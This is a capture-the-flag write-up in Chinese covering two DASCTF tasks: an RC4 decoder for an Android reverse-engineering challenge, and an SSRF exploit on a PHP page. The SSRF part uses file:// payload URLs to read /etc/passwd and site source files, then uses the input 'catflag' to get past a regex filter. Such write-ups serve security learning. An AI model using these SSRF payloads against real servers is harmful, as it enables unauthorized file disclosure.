1、RE-babyandroid
通过jadx打开apk文件,看到关键源码如下:
然后继续读initKey和babycrypt代码,然后发现init构造key,接着通过交换key和异或构造babycrypt,感觉就是RC4代码啊
尝试发现可以
或者自己编写exp:
def initKey(key):
state = [i for i in range(256)]
index1 = 0
index2 = 0
for i2 in range(256):
index2 = ((key[index1] & 255) + (state[i2] & 255) + index2) & 255;
tmp = state[i2]
state[i2] = state[index2]
state[index2] = tmp
index1 = (index1 + 1) % len(key)
return state
def decode(input,mKkey):
x = 0
y = 0
key = initKey(mKkey)
#print(key)
result = []
for i in range(len(input)):
x = (x + 1) & 255;
y = ((key[x] & 255) + y) & 255;
tmp = key[x]
key[x] = key[y]
key[y] = tmp
result.append(chr((input[i] ^ key[((key[x] & 255) + (key[y] & 255)) & 255])&0xFF))
return result
def main():
compare = [-79, 120, 21, 51, -32, -101, -56, -65, -4, -31, 79, 124, -9, -79, -88, 42, -69, 99, -15, 45, 48, -53, 20, -97, 108, -60, 67, -51]
f110k = [97,98,99,100,101,102,103]
result = decode(compare,f110k)
print(''.join(result))
if __name__ == '__main__':
main()
#DASCTF{2ndro1d_cr3pt_by_rc4}
得到flag如下:
DASCTF{2ndro1d_cr3pt_by_rc4}
2、WEB-Try2ReadFlag
题目描述
题目名称:
Try2ReadFlag
题目内容:
小明创建了一个测试站点,但是这个站点有什么用呢?
题目分值:
100.0
题目难度:
容易
题目打开之后发现如下界面
通过点击下面的Page1、Page2、Page3,发现url有如下变化
http://80.endpoint-021e3537e5ad441a9def50cfe3ccff9c.m.ins.cloud.dasctf.com:81/index.php?url=http://127.0.0.1/3.html
想到ssrf漏洞,那么可以通过file协议读取文件内容,首先尝试读取/etc/passwd
http://80.endpoint-021e3537e5ad441a9def50cfe3ccff9c.m.ins.cloud.dasctf.com:81/index.php?url=file:///etc/passwd
发现可以读取,然后尝试读取/flag,发现不行,那么估计名字不是这个
然后读取index.php文件
http://80.endpoint-021e3537e5ad441a9def50cfe3ccff9c.m.ins.cloud.dasctf.com:81/index.php?url=file:///var/www/html/index.php
然后右键发现如下源码
<?php
error_reporting(0);
$url = $_GET['url'];
$input = explode(":", $url)[0];
if ($input == "http" or $input == "file" ){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);
}
?>
发现可以使用http和file协议,然后没啥发现,接着爆破文件目录发现存在flag.php文件
http://80.endpoint-021e3537e5ad441a9def50cfe3ccff9c.m.ins.cloud.dasctf.com:81/index.php?url=file:///var/www/html/flag.php
读取源码发现
<?php
error_reporting(0);
$input = $_POST['input'];
if(preg_match('/cat.+?flag/is', $input)) { //.*?(任意个字符)和.+?(大于等于1个字符)
die("no");
}
if ((substr($input,0,3) == "cat") and (substr($input,-4,4)=="flag")){ //前三个字符:cat 最后4个字符flag
echo system("ls /");
}
那么可以构造payload,让cat和flag之间不存在任何字符,这样就可以绕过上面的die
input=catflag
得到flag文件名F1agg_f1ag
然后通过file文件读取这个文件内容
得到flag如下:
flag{39418652103944976554117681913396}